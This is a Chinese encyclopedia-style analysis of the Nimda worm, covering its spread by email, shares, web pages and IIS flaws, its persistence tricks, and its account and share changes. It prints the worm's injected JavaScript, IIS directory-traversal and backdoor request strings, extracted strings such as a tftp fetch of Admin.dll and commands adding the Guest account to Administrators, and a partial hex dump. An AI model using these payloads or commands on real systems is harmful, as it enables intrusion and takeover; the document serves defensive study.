Nimda蠕蟲病毒

Nimda蠕蟲病毒

一種更具破壞力的惡意代碼——Nimda worm 蠕蟲開始在Internet上迅速蔓延傳播。Nimda蠕蟲病毒感染Windows 系列多種計算機系統,通過多種渠道傳播,其傳播速度之快、影響範圍之廣、破壞力之強都超過Code Red II。

基本介紹

  • 中文名:Nimda蠕蟲病毒
  • 屬於:一種更具破壞力的惡意代碼
  • 特點:傳播速度之快、影響範圍之廣
  • 包含:從中讀取SMTP地址和email地址
簡介,影響系統,傳播方式,影響,分析,解決方案,

簡介

該病毒會通過email傳播,當用戶郵件的正文為空,似乎沒有附屬檔案,實際上郵件中嵌入了病毒的執行代碼,當用戶用OUTLOOK、OUTLOOK EXPRESS(沒有安裝微軟的補丁包的情況下)收郵件,在預覽郵件時,病毒就已經不知不覺中執行了。在正常運行過程(載入,開連線埠,掃描弱口令,感染)中,病毒執行時會將自己複製到臨時目錄,再運行在臨時目錄中的副本。病毒還會在windows的system目錄中生成load.exe檔案,同時修改system.ini中的shell從shell=explorer.exe改為explorer.exe load.exe -dontrunold,使病毒在下次系統啟動時仍然被激活。另外,在system目錄下,病毒還會生成一個副本:riched20.dll。為了通過郵件將自己傳播出去,病毒使用了MAPI函式讀取用戶的email並從中讀取SMTP地址和email地址。
另外,病毒運行時會利用ShellExcute執行系統中的一些命令如:NET.EXE、USER.EXE、SHARE.EXE等命令,將Guest用戶添加到Guests、Administrators組(針對NT/2000/XP),並激活Guest用戶。還將C糟根目錄共享出來。

影響系統

Windows95,98,ME,NT 和2000 所有客戶端和伺服器系統

傳播方式

* 通過電子郵件從一個客戶端感染另一個客戶端
* 通過開放的網路共享從一個客戶端感染另一個客戶端
* 通過瀏覽被感染的網站從Web 伺服器感染客戶端
* 通過主動掃描或利用 “Microsoft ⅡS 4.0 / 5.0 directory traversal”的缺陷”從客戶端感染Web 伺服器
* 通過掃描 “Code Red” (IN-2001-09),和 “sadmind/ⅡS” (CA-2001-11) 留下的後門客戶端感染Web 伺服器

影響

感染Nimda 病毒的機器會不斷向Windows 的地址薄中的所有的郵件傳送攜帶了Nimda病毒的郵件的拷貝。
同樣的,客戶端機器會掃描有漏洞的ⅡS 伺服器。Nimda 會搜尋以前的ⅡS蠕蟲病毒留下的後門:Code Red Ⅱ [IN-2001-09] 和 sadmind/ⅡS worm [CA-2001-11]; 它也試圖利用ⅡS Directory Traversal 漏洞 (VU #111677)。
初步分析表明,該病毒除了改變網頁的目錄以繁衍自身外沒有其它破壞性的行為。但通過大量傳送電子郵件和掃描網路可以導致網路的“拒絕服務”(DoS)。

分析

被感染的機器會傳送一份Nimda病毒代碼複本到任何在掃描中發現有漏洞的伺服器。一旦在該伺服器上運行,蠕蟲就會遍歷系統里的每一個目錄(甚至包括所有通過已分享檔案可以讀取得目錄),然後會在磁碟里留下一份自身拷貝,取名為"README.EML"。一旦找到了含有web內容的目錄(包含html或asp檔案),下面Javascript代碼段就會被添加到每一個跟web有關的檔案中:
<script language="JavaScript">window.open("readme.eml",null,
"resizable=no,top=6000,left=6000")
</script>
這段代碼使得蠕蟲可以進一步繁衍,通過瀏覽器或瀏覽網路檔案感染到新的客戶端。
通過瀏覽器傳播
作為感染過程的一部分,Nimda 更改所有的含有web內容的檔案(象 .htm,,html,.asp 等檔案)。這樣,任何用戶瀏覽該檔案,不管是通過瀏覽器還是網路,就可能會下載一份該病毒。有些瀏覽器會自動的執行下載動作,感染正在瀏覽該網站的機器。
通過檔案系統感染
Nimda病毒生成大量的自身的複本,取名為README.EML,寫到該用戶有可寫許可權的目錄里。如果在另一台機器的用戶通過網路共享選取病毒檔案,並且設定了預覽功能的話,蠕蟲就會威脅到這台新的機器。
系統記錄
對任何開放80/tcp連線埠的web伺服器,Nimda蠕蟲的掃描會生成下面的日誌:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\
x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
註:這個例子的前四行表明在試圖連線Red Code Ⅱ 留下的後門,例子的其餘部分在試圖利用Directory Traversal 漏洞。

解決方案

各單位必須高度重視抵抗本次病毒工作,迅速組織管理人員, 密切監視網路運行狀態,一旦發現此類蠕蟲,迅速採取處理措施。
為了讓大家更好的研究和應對這種類型的病毒,特此提供病毒部分反彙編代碼:
病毒數據串
" .exe"
" -dontrunold"
" -qusery9bnow"
"% Privileged Time"
"% Processor Time"
"% User Time"
"%ld %ld %ld"
"%ld %ld"
"%ls"
"."
".."
".asp"
".doc"
".eml"
".exe"
".htm"
".nws"
"/_mem_bin/..%255c../..%255c../..%255c.."
"/_vti_bin/..%255c../..%255c../..%255c.."
"/Admin.dll"
"/c"
"/d"
"/MSADC"
"/msadc/..%255c../..%255c../..%255c/..%c1%1c../"
"/root.exe?/c+"
"/scripts"
"/scripts/..%%35%63.."
"/scripts/..%%35c.."
"/scripts/..%25%35%63.."
"/scripts/..%252f.."
"/scripts/..%255c.."
"/scripts/..%c0%2f.."
"/scripts/..%c0%af.."
"/scripts/..%c1%1c.."
"/scripts/..%c1%9c.."
"/winnt/system32/cmd.exe?/c+"
"\"
"\*.*"
"\\"
"\\%s"
"\load.exe"
"\mmc.exe"
"\readme*.exe"
"\readme.eml"
"\riched20.dll"
"\system.ini"
"\wininit.ini"
"__WSAFDIsSet"
">"
"aabbcc"
"admin.dll"
"Admin.dll"
"bind"
"boot"
"c:"
"C:\"
"c:\Admin.dll"
"Cache"
"closesocket"
"connect"
"Context Switches/sec"
"Counter 009"
"Counters"
"CreateRemoteThread"
"d:\Admin.dll"
"DATA"
"default"
"dir"
"dontrunold"
"e:\Admin.dll"
"Elapsed Time"
"Exec Read Only"
"Exec Read/Write"
"Exec Write Copy"
"Executable"
"EXPLORER"
"explorer.exe load.exe -dontrunold"
"Flags"
"From: <"
"fsdhqherwqi2001"
"GET %s HTTP/1.0"
"gethostbyname"
"gethostname"
"HeapAlloc"
"HeapCompact"
"HeapCreate"
"HeapDestroy"
"HeapFree"
"HELO "
"Hidden"
"HideFileExt"
"html"
"htonl"
"htons"
"ID Process"
"ID Thread"
"Image Space Exec Read Only"
"Image Space Exec Read/Write"
"Image Space Exec Write Copy"
"Image Space Executable"
"Image Space No Access"
"Image Space Read Only"
"Image Space Read/Write"
"Image Space Write Copy"
"Image"
"index"
"inet_addr"
"inet_ntoa"
"ioctlsocket"
"KERNEL32.DLL"
"Last Counter"
"localgroup Administrators guest "
"localgroup Guests guest /add"
"MAIL FROM: <"
"main"
"MAPI32.DLL"
"MAPIFindNext"
"MAPIFreeBuffer"
"MAPILogoff"
"MAPILogon"
"MAPIReadMail"
"MAPIResolveName"
"MAPISendMail"
"Mapped Space Exec Read Only"
"Mapped Space Exec Read/Write"
"Mapped Space Exec Write Copy"
"Mapped Space Executable"
"Mapped Space No Access"
"Mapped Space Read Only"
"Mapped Space Read/Write"
"Mapped Space Write Copy"
"mep"
"MIME-Version: 1.0"
"MPR.DLL"
"NameServer"
"net"
"No Access"
"ntohl"
"ntohs"
"NUL="
"NULL"
"octet"
"open"
"Page Faults/sec"
"Parm1enc"
"Parm2enc"
"Path"
"Personal"
"Priority Base"
"Priority Current"
"Private Bytes"
"Process Address Space"
"Process"
"QUIT"
"qusery9bnow"
"RCPT TO: <"
"Read Only"
"Read/Write"
"readme"
"recv"
"recvfrom"
"RegisterServiceProcess"
"Remark"
"Reserved Space Exec Read Only"
"Reserved Space Exec Read/Write"
"Reserved Space Exec Write Copy"
"Reserved Space Executable"
"Reserved Space No Access"
"Reserved Space Read Only"
"Reserved Space Read/Write"
"Reserved Space Write Copy"
"riched20.dll"
"select"
"send"
"sendto"
"share c$=c:\"
"Shell"
"SHELL32.DLL"
"ShellExecuteA"
"ShowSuperHidden"
"socket"
"software\microsoft\windows nt\currentversion\p"
"SOFTWARE\Microsoft\Windows\CurrentVersion\App "
"Software\Microsoft\Windows\CurrentVersion\Expl"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Netw"
"Start Address"
"Subject: "
"SYSTEM\CurrentControlSet\Services\lanmanserver"
"SYSTEM\CurrentControlSet\Services\Tcpip\Parame"
"System\CurrentControlSet\Services\VxD\MSTCP"
"tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20"
"Thread Details"
"Thread"
"Type"
"user guest """
"user guest /active"
"user guest /add"
"User PC"
"Version"
"Virtual Bytes Peak"
"Virtual Bytes"
"VirtualAllocEx"
"VirtualFreeEx"
"VirtualProtectEx"
"VirtualQueryEx"
"winzip32.exe"
"WNetAddConnection2A"
"WNetCancelConnection2A"
"WNetCloseEnum"
"WNetEnumResourceA"
"WNetOpenEnumA"
"Working Set Peak"
"Working Set"
"Write Copy"
"ws2_32.dll"
"WSACleanup"
"WSAStartup"
代碼數據
:36179000 00 00 00 00 00 00 00 00 ........
:36179008 00 00 00 00 00 00 00 00 ........
:36179010 2E 00 00 00 53 79 73 74 ....Syst
:36179018 65 6D 5C 43 75 72 72 65 em\Curre
:36179020 6E 74 43 6F 6E 74 72 6F ntContro
:36179028 6C 53 65 74 5C 53 65 72 lSet\Ser
:36179030 76 69 63 65 73 5C 56 78 vices\Vx
:36179038 44 5C 4D 53 54 43 50 00 D\MSTCP.
:36179040 4E 61 6D 65 53 65 72 76 NameServ
:36179048 65 72 00 00 53 59 53 54 er..SYST
:36179050 45 4D 5C 43 75 72 72 65 EM\Curre
:36179058 6E 74 43 6F 6E 74 72 6F ntContro
:36179060 6C 53 65 74 5C 53 65 72 lSet\Ser
:36179068 76 69 63 65 73 5C 54 63 vices\Tc
:36179070 70 69 70 5C 50 61 72 61 pip\Para
:36179078 6D 65 74 65 72 73 5C 49 meters\I
:36179080 6E 74 65 72 66 61 63 65 nterface
:36179088 73 5C 00 00 53 59 53 54 s\..SYST
:36179090 45 4D 5C 43 75 72 72 65 EM\Curre
:36179098 6E 74 43 6F 6E 74 72 6F ntContro
:361790A0 6C 53 65 74 5C 53 65 72 lSet\Ser
:361790A8 76 69 63 65 73 5C 54 63 vices\Tc
:361790B0 70 69 70 5C 50 61 72 61 pip\Para
:361790B8 6D 65 74 65 72 73 5C 49 meters\I
:361790C0 6E 74 65 72 66 61 63 65 nterface
:361790C8 73 00 00 00 43 6F 6E 63 s...Conc
:361790D0 65 70 74 20 56 69 72 75 ept Viru
:361790D8 73 28 43 56 29 20 56 2E s(CV) V.
:361790E0 35 2C 20 43 6F 70 79 72 5,Copyr
:361790E8 69 67 68 74 28 43 29 32 ight(C)2
:361790F0 30 30 31 20 20 52 2E 50 001 R.P
:361790F8 2E 43 68 69 6E 61 00 00 .China..
:36179100 4D 49 4D 45 2D 56 65 72 MIME-Ver
:36179108 73 69 6F 6E 3A 20 31 2E sion: 1.
:36179110 30 0D 0A 43 6F 6E 74 65 0..Conte
:36179118 6E 74 2D 54 79 70 65 3A nt-Type:
:36179120 20 6D 75 6C 74 69 70 61 multipa
:36179128 72 74 2F 72 65 6C 61 74 rt/relat
:36179130 65 64 3B 0D 0A 09 74 79 ed;...ty
:36179138 70 65 3D 22 6D 75 6C 74 pe="mult
:36179140 69 70 61 72 74 2F 61 6C ipart/al
:36179148 74 65 72 6E 61 74 69 76 ternativ
:36179150 65 22 3B 0D 0A 09 62 6F e";...bo
:36179158 75 6E 64 61 72 79 3D 22 undary="
:36179160 3D 3D 3D 3D 5F 41 42 43 ====_ABC
:36179168 31 32 33 34 35 36 37 38 12345678
:36179170 39 30 44 45 46 5F 3D 3D 90DEF_==
:36179178 3D 3D 22 0D 0A 58 2D 50 =="..X-P
:36179180 72 69 6F 72 69 74 79 3A riority:
:36179188 20 33 0D 0A 58 2D 4D 53 3..X-MS
:36179190 4D 61 69 6C 2D 50 72 69 Mail-Pri
:36179198 6F 72 69 74 79 3A 20 4E ority: N
:361791A0 6F 72 6D 61 6C 0D 0A 58 ormal..X
:361791A8 2D 55 6E 73 65 6E 74 3A -Unsent:
:361791B0 20 31 0D 0A 0D 0A 2D 2D 1....--
:361791B8 3D 3D 3D 3D 5F 41 42 43 ====_ABC
:361791C0 31 32 33 34 35 36 37 38 12345678
:361791C8 39 30 44 45 46 5F 3D 3D 90DEF_==
:361791D0 3D 3D 0D 0A 43 6F 6E 74 ==..Cont
:361791D8 65 6E 74 2D 54 79 70 65 ent-Type
:361791E0 3A 20 6D 75 6C 74 69 70 : multip
:361791E8 61 72 74 2F 61 6C 74 65 art/alte
:361791F0 72 6E 61 74 69 76 65 3B rnative;
:361791F8 0D 0A 09 62 6F 75 6E 64 ...bound
:36179200 61 72 79 3D 22 3D 3D 3D ary="===
:36179208 3D 5F 41 42 43 30 39 38 =_ABC098
:36179210 37 36 35 34 33 32 31 44 7654321D
:36179218 45 46 5F 3D 3D 3D 3D 22 EF_===="
:36179220 0D 0A 0D 0A 2D 2D 3D 3D ....--==
:36179228 3D 3D 5F 41 42 43 30 39 ==_ABC09
:36179230 38 37 36 35 34 33 32 31 87654321
:36179238 44 45 46 5F 3D 3D 3D 3D DEF_====
:36179240 0D 0A 43 6F 6E 74 65 6E ..Conten
:36179248 74 2D 54 79 70 65 3A 20 t-Type:
:36179250 74 65 78 74 2F 68 74 6D text/htm
:36179258 6C 3B 0D 0A 09 63 68 61 l;...cha
:36179260 72 73 65 74 3D 22 69 73 rset="is
:36179268 6F 2D 38 38 35 39 2D 31 o-8859-1
:36179270 22 0D 0A 43 6F 6E 74 65 "..Conte
:36179278 6E 74 2D 54 72 61 6E 73 nt-Trans
:36179280 66 65 72 2D 45 6E 63 6F fer-Enco
:36179288 64 69 6E 67 3A 20 71 75 ding: qu
:36179290 6F 74 65 64 2D 70 72 69 oted-pri
:36179298 6E 74 61 62 6C 65 0D 0A ntable..
:361792A0 0D 0A 0D 0A 3C 48 54 4D ....<HTM
:361792A8 4C 3E 3C 48 45 41 44 3E L><HEAD>
:361792B0 3C 2F 48 45 41 44 3E 3C </HEAD><
:361792B8 42 4F 44 59 20 62 67 43 BODY bgC
:361792C0 6F 6C 6F 72 3D 33 44 23 olor=3D#
:361792C8 66 66 66 66 66 66 3E 0D ffffff>.
:361792D0 0A 3C 69 66 72 61 6D 65 .<iframe
:361792D8 20 73 72 63 3D 33 44 63 src=3Dc
:361792E0 69 64 3A 45 41 34 44 4D id:EA4DM
:361792E8 47 42 50 39 70 20 68 65 GBP9p he
:361792F0 69 67 68 74 3D 33 44 30 ight=3D0
:361792F8 20 77 69 64 74 68 3D 33 width=3
:36179300 44 30 3E 0D 0A 3C 2F 69 D0>..</i
:36179308 66 72 61 6D 65 3E 3C 2F frame></
:36179310 42 4F 44 59 3E 3C 2F 48 BODY></H
:36179318 54 4D 4C 3E 0D 0A 2D 2D TML>..--
:36179320 3D 3D 3D 3D 5F 41 42 43 ====_ABC
:36179328 30 39 38 37 36 35 34 33 09876543
:36179330 32 31 44 45 46 5F 3D 3D 21DEF_==
:36179338 3D 3D 2D 2D 0D 0A 0D 0A ==--....
:36179340 2D 2D 3D 3D 3D 3D 5F 41 --====_A
:36179348 42 43 31 32 33 34 35 36 BC123456
:36179350 37 38 39 30 44 45 46 5F 7890DEF_
:36179358 3D 3D 3D 3D 0D 0A 43 6F ====..Co
:36179360 6E 74 65 6E 74 2D 54 79 ntent-Ty
:36179368 70 65 3A 20 61 75 64 69 pe: audi
:36179370 6F 2F 78 2D 77 61 76 3B o/x-wav;
:36179378 0D 0A 09 6E 61 6D 65 3D ...name=
:36179380 22 72 65 61 64 6D 65 2E "readme.
:36179388 65 78 65 22 0D 0A 43 6F exe"..Co
:36179390 6E 74 65 6E 74 2D 54 72 ntent-Tr
:36179398 61 6E 73 66 65 72 2D 45 ansfer-E
:361793A0 6E 63 6F 64 69 6E 67 3A ncoding:
:361793A8 20 62 61 73 65 36 34 0D base64.
:361793B0 0A 43 6F 6E 74 65 6E 74 .Content
:361793B8 2D 49 44 3A 20 3C 45 41 -ID: <EA
:361793C0 34 44 4D 47 42 50 39 70 4DMGBP9p
:361793C8 3E 0D 0A 0D 0A 00 00 00 >.......
:361793D0 0D 0A 0D 0A 2D 2D 3D 3D ....--==
:361793D8 3D 3D 5F 41 42 43 31 32 ==_ABC12
:361793E0 33 34 35 36 37 38 39 30 34567890
:361793E8 44 45 46 5F 3D 3D 3D 3D DEF_====
:361793F0 0D 0A 0D 0A 00 00 00 00 ........
:361793F8 4E 55 4C 3D 00 00 00 00 NUL=....
:36179400 0D 0A 0D 0A 5B 72 65 6E ....[ren
:36179408 61 6D 65 5D 0D 0A 00 00 ame]....
:36179410 5C 77 69 6E 69 6E 69 74 \wininit
:36179418 2E 69 6E 69 00 00 00 00 .ini....
:36179420 43 3A 5C 00 50 65 72 73 C:\.Pers
:36179428 6F 6E 61 6C 00 00 00 00 onal....
:36179430 53 6F 66 74 77 61 72 65 Software
:36179438 5C 4D 69 63 72 6F 73 6F \Microso
:36179440 66 74 5C 57 69 6E 64 6F ft\Windo
:36179448 77 73 5C 43 75 72 72 65 ws\Curre
:36179450 6E 74 56 65 72 73 69 6F ntVersio
:36179458 6E 5C 45 78 70 6C 6F 72 n\Explor
:36179460 65 72 5C 53 68 65 6C 6C er\Shell
:36179468 20 46 6F 6C 64 65 72 73 Folders
:36179470 00 00 00 00 5C 00 00 00 ....\...
:36179478 2E 2E 00 00 5C 2A 2E 2A ....\*.*
:36179480 00 00 00 00 04 00 00 80 ........
:36179488 02 00 00 80 45 58 50 4C ....EXPL
:36179490 4F 52 45 52 00 00 00 00 ORER....
:36179498 66 73 64 68 71 68 65 72 fsdhqher
:361794A0 77 71 69 32 30 30 31 00 wqi2001.
:361794A8 53 59 53 54 45 4D 5C 43 SYSTEM\C
:361794B0 75 72 72 65 6E 74 43 6F urrentCo
:361794B8 6E 74 72 6F 6C 53 65 74 ntrolSet
:361794C0 5C 53 65 72 76 69 63 65 \Service
:361794C8 73 5C 6C 61 6E 6D 61 6E s\lanman
:361794D0 73 65 72 76 65 72 5C 53 server\S
:361794D8 68 61 72 65 73 5C 53 65 hares\Se
:361794E0 63 75 72 69 74 79 00 00 curity..
:361794E8 73 68 61 72 65 20 63 24 share c$
:361794F0 3D 63 3A 5C 00 00 00 00 =c:\....
:361794F8 75 73 65 72 20 67 75 65 user gue
:36179500 73 74 20 22 22 00 00 00 st ""...
:36179508 6C 6F 63 61 6C 67 72 6F localgro
:36179510 75 70 20 41 64 6D 69 6E up Admin
:36179518 69 73 74 72 61 74 6F 72 istrator
:36179520 73 20 67 75 65 73 74 20 s guest
:36179528 2F 61 64 64 00 00 00 00 /add....
:36179530 6C 6F 63 61 6C 67 72 6F localgro
:36179538 75 70 20 47 75 65 73 74 up Guest
:36179540 73 20 67 75 65 73 74 20 s guest
:36179548 2F 61 64 64 00 00 00 00 /add....
:36179550 75 73 65 72 20 67 75 65 user gue
:36179558 73 74 20 2F 61 63 74 69 st /acti
:36179560 76 65 00 00 6F 70 65 6E ve..open
:36179568 00 00 00 00 75 73 65 72 ....user
:36179570 20 67 75 65 73 74 20 2F guest /
:36179578 61 64 64 00 6E 65 74 00
:36179580 48 69 64 65 46 69 6C 65 HideFile
:36179588 45 78 74 00 53 68 6F 77 Ext.Show
:36179590 53 75 70 65 72 48 69 64 SuperHid
:36179598 64 65 6E 00 48 69 64 64 den.Hidd
:361795A0 65 6E 00 00 53 6F 66 74 en..Soft
:361795A8 77 61 72 65 5C 4D 69 63 ware\Mic
:361795B0 72 6F 73 6F 66 74 5C 57 rosoft\W
:361795B8 69 6E 64 6F 77 73 5C 43 indows\C
:361795C0 75 72 72 65 6E 74 56 65 urrentVe
:361795C8 72 73 69 6F 6E 5C 45 78 rsion\Ex
:361795D0 70 6C 6F 72 65 72 5C 41 plorer\A
:361795D8 64 76 61 6E 63 65 64 00 dvanced.
:361795E0 25 6C 73 00 5C 5C 25 73 %ls.\\%s
:361795E8 00 00 00 00 25 6C 64 20 ....%ld
:361795F0 25 6C 64 20 25 6C 64 00 %ld %ld.
:361795F8 25 6C 64 20 25 6C 64 00 %ld %ld.
:36179600 49 6D 61 67 65 20 53 70 Image Sp
:36179608 61 63 65 20 45 78 65 63 ace Exec
:36179610 20 57 72 69 74 65 20 43 Write C
:36179618 6F 70 79 00 49 6D 61 67 opy.Imag
:36179620 65 20 53 70 61 63 65 20 e Space
:36179628 45 78 65 63 20 52 65 61 Exec Rea
:36179630 64 2F 57 72 69 74 65 00 d/Write.
:36179638 49 6D 61 67 65 20 53 70 Image Sp
:36179640 61 63 65 20 45 78 65 63 ace Exec
:36179648 20 52 65 61 64 20 4F 6E Read On
:36179650 6C 79 00 00 49 6D 61 67 ly..Imag
:36179658 65 20 53 70 61 63 65 20 e Space
:36179660 45 78 65 63 75 74 61 62 Executab
:36179668 6C 65 00 00 49 6D 61 67 le..Imag
:36179670 65 20 53 70 61 63 65 20 e Space
:36179678 57 72 69 74 65 20 43 6F Write Co
:36179680 70 79 00 00 49 6D 61 67 py..Imag
:36179688 65 20 53 70 61 63 65 20 e Space
:36179690 52 65 61 64 2F 57 72 69 Read/Wri
:36179698 74 65 00 00 49 6D 61 67 te..Imag
:361796A0 65 20 53 70 61 63 65 20 e Space
:361796A8 52 65 61 64 20 4F 6E 6C Read Onl
:361796B0 79 00 00 00 49 6D 61 67 y...Imag
:361796B8 65 20 53 70 61 63 65 20 e Space
:361796C0 4E 6F 20 41 63 63 65 73 No Acces
:361796C8 73 00 00 00 4D 61 70 70 s...Mapp
:361796D0 65 64 20 53 70 61 63 65 ed Space
:361796D8 20 45 78 65 63 20 57 72 Exec Wr
:361796E0 69 74 65 20 43 6F 70 79 ite Copy
:361796E8 00 00 00 00 4D 61 70 70 ....Mapp
:361796F0 65 64 20 53 70 61 63 65 ed Space
:361796F8 20 45 78 65 63 20 52 65 Exec Re
:36179700 61 64 2F 57 72 69 74 65 ad/Write
:36179708 00 00 00 00 4D 61 70 70 ....Mapp
:36179710 65 64 20 53 70 61 63 65 ed Space
:36179718 20 45 78 65 63 20 52 65 Exec Re
:36179720 61 64 20 4F 6E 6C 79 00 ad Only.
:36179728 4D 61 70 70 65 64 20 53 Mapped S
:36179730 70 61 63 65 20 45 78 65 pace Exe
:36179738 63 75 74 61 62 6C 65 00 cutable.
:36179740 4D 61 70 70 65 64 20 53 Mapped S
:36179748 70 61 63 65 20 57 72 69 pace Wri
:36179750 74 65 20 43 6F 70 79 00 te Copy.
:36179758 4D 61 70 70 65 64 20 53 Mapped S
:36179760 70 61 63 65 20 52 65 61 pace Rea
:36179768 64 2F 57 72 69 74 65 00 d/Write.
:36179770 4D 61 70 70 65 64 20 53 Mapped S
:36179778 70 61 63 65 20 52 65 61 pace Rea
:36179780 64 20 4F 6E 6C 79 00 00 d Only..
:36179788 4D 61 70 70 65 64 20 53 Mapped S
:36179790 70 61 63 65 20 4E 6F 20 pace No
:36179798 41 63 63 65 73 73 00 00 Access..
:361797A0 52 65 73 65 72 76 65 64 Reserved
:361797A8 20 53 70 61 63 65 20 45 Space E
:361797B0 78 65 63 20 57 72 69 74 xec Writ
:361797B8 65 20 43 6F 70 79 00 00 e Copy..
:361797C0 52 65 73 65 72 76 65 64 Reserved
:361797C8 20 53 70 61 63 65 20 45 Space E
:361797D0 78 65 63 20 52 65 61 64 xec Read
:361797D8 2F 57 72 69 74 65 00 00 /Write..
:361797E0 52 65 73 65 72 76 65 64 Reserved
:361797E8 20 53 70 61 63 65 20 45 Space E
:361797F0 78 65 63 20 52 65 61 64 xec Read
:361797F8 20 4F 6E 6C 79 00 00 00 Only...
:36179800 52 65 73 65 72 76 65 64 Reserved
:36179808 20 53 70 61 63 65 20 45 Space E
:36179810 78 65 63 75 74 61 62 6C xecutabl
:36179818 65 00 00 00 52 65 73 65 e...Rese
:36179820 72 76 65 64 20 53 70 61 rved Spa
:36179828 63 65 20 57 72 69 74 65 ce Write
:36179830 20 43 6F 70 79 00 00 00 Copy...
:36179838 52 65 73 65 72 76 65 64 Reserved
:36179840 20 53 70 61 63 65 20 52 Space R
:36179848 65 61 64 2F 57 72 69 74 ead/Writ
:36179850 65 00 00 00 52 65 73 65 e...Rese
:36179858 72 76 65 64 20 53 70 61 rved Spa
:36179860 63 65 20 52 65 61 64 20 ce Read
:36179868 4F 6E 6C 79 00 00 00 00 Only....
:36179870 52 65 73 65 72 76 65 64 Reserved
:36179878 20 53 70 61 63 65 20 4E Space N
:36179880 6F 20 41 63 63 65 73 73 o Access
:36179888 00 00 00 00 50 72 6F 63 ....Proc
:36179890 65 73 73 20 41 64 64 72 ess Addr
:36179898 65 73 73 20 53 70 61 63 ess Spac
:361798A0 65 00 00 00 45 78 65 63 e...Exec
:361798A8 20 57 72 69 74 65 20 43 Write C
:361798B0 6F 70 79 00 45 78 65 63 opy.Exec
:361798B8 20 52 65 61 64 2F 57 72 Read/Wr
:361798C0 69 74 65 00 45 78 65 63 ite.Exec
:361798C8 20 52 65 61 64 20 4F 6E Read On
:361798D0 6C 79 00 00 45 78 65 63 ly..Exec
:361798D8 75 74 61 62 6C 65 00 00 utable..
:361798E0 57 72 69 74 65 20 43 6F Write Co
:361798E8 70 79 00 00 52 65 61 64 py..Read
:361798F0 2F 57 72 69 74 65 00 00 /Write..
:361798F8 52 65 61 64 20 4F 6E 6C Read Onl
:36179900 79 00 00 00 4E 6F 20 41 y...No A
:36179908 63 63 65 73 73 00 00 00 ccess...
:36179910 49 6D 61 67 65 00 00 00 Image...
:36179918 55 73 65 72 20 50 43 00 User PC.
:36179920 54 68 72 65 61 64 20 44 Thread D
:36179928 65 74 61 69 6C 73 00 00 etails..
:36179930 49 44 20 54 68 72 65 61 ID Threa
:36179938 64 00 00 00 50 72 69 6F d...Prio
:36179940 72 69 74 79 20 43 75 72 rity Cur
:36179948 72 65 6E 74 00 00 00 00 rent....
:36179950 43 6F 6E 74 65 78 74 20 Context
:36179958 53 77 69 74 63 68 65 73 Switches
:36179960 2F 73 65 63 00 00 00 00 /sec....
:36179968 53 74 61 72 74 20 41 64 Start Ad
:36179970 64 72 65 73 73 00 00 00 dress...
:36179978 54 68 72 65 61 64 00 00 Thread..
:36179980 50 61 67 65 20 46 61 75 Page Fau
:36179988 6C 74 73 2F 73 65 63 00 lts/sec.
:36179990 56 69 72 74 75 61 6C 20 Virtual
:36179998 42 79 74 65 73 20 50 65 Bytes Pe
:361799A0 61 6B 00 00 56 69 72 74 ak..Virt
:361799A8 75 61 6C 20 42 79 74 65 ual Byte
:361799B0 73 00 00 00 50 72 69 76 s...Priv
:361799B8 61 74 65 20 42 79 74 65 ate Byte
:361799C0 73 00 00 00 49 44 20 50 s...ID P
:361799C8 72 6F 63 65 73 73 00 00 rocess..
:361799D0 45 6C 61 70 73 65 64 20 Elapsed
:361799D8 54 69 6D 65 00 00 00 00 Time....
:361799E0 50 72 69 6F 72 69 74 79 Priority
:361799E8 20 42 61 73 65 00 00 00 Base...
:361799F0 57 6F 72 6B 69 6E 67 20 Working
:361799F8 53 65 74 20 50 65 61 6B Set Peak
:36179A00 00 00 00 00 57 6F 72 6B ....Work
:36179A08 69 6E 67 20 53 65 74 00 ing Set.
:36179A10 25 20 55 73 65 72 20 54 % User T
:36179A18 69 6D 65 00 25 20 50 72 ime.% Pr
:36179A20 69 76 69 6C 65 67 65 64 ivileged
:36179A28 20 54 69 6D 65 00 00 00 Time...
:36179A30 25 20 50 72 6F 63 65 73 % Proces
:36179A38 73 6F 72 20 54 69 6D 65 sor Time
:36179A40 00 00 00 00 50 72 6F 63 ....Proc
:36179A48 65 73 73 00 43 6F 75 6E ess.Coun
:36179A50 74 65 72 20 30 30 39 00 ter 009.
:36179A58 73 6F 66 74 77 61 72 65 software
:36179A60 5C 6D 69 63 72 6F 73 6F \microso
:36179A68 66 74 5C 77 69 6E 64 6F ft\windo
:36179A70 77 73 20 6E 74 5C 63 75 ws nt\cu
:36179A78 72 72 65 6E 74 76 65 72 rrentver
:36179A80 73 69 6F 6E 5C 70 65 72 sion\per
:36179A88 66 6C 69 62 5C 30 30 39 flib\009
:36179A90 00 00 00 00 43 6F 75 6E ....Coun
:36179A98 74 65 72 73 00 00 00 00 ters....
:36179AA0 56 65 72 73 69 6F 6E 00 Version.
:36179AA8 4C 61 73 74 20 43 6F 75 Last Cou
:36179AB0 6E 74 65 72 00 00 00 00 nter....
:36179AB8 73 6F 66 74 77 61 72 65 software
:36179AC0 5C 6D 69 63 72 6F 73 6F \microso
:36179AC8 66 74 5C 77 69 6E 64 6F ft\windo
:36179AD0 77 73 20 6E 74 5C 63 75 ws nt\cu
:36179AD8 72 72 65 6E 74 76 65 72 rrentver
:36179AE0 73 69 6F 6E 5C 70 65 72 sion\per
:36179AE8 66 6C 69 62 00 00 00 00 flib....
:36179AF0 2F 73 63 72 69 70 74 73 /scripts
:36179AF8 00 00 00 00 2F 4D 53 41 ..../MSA
:36179B00 44 43 00 00 2F 63 00 00 DC../c..
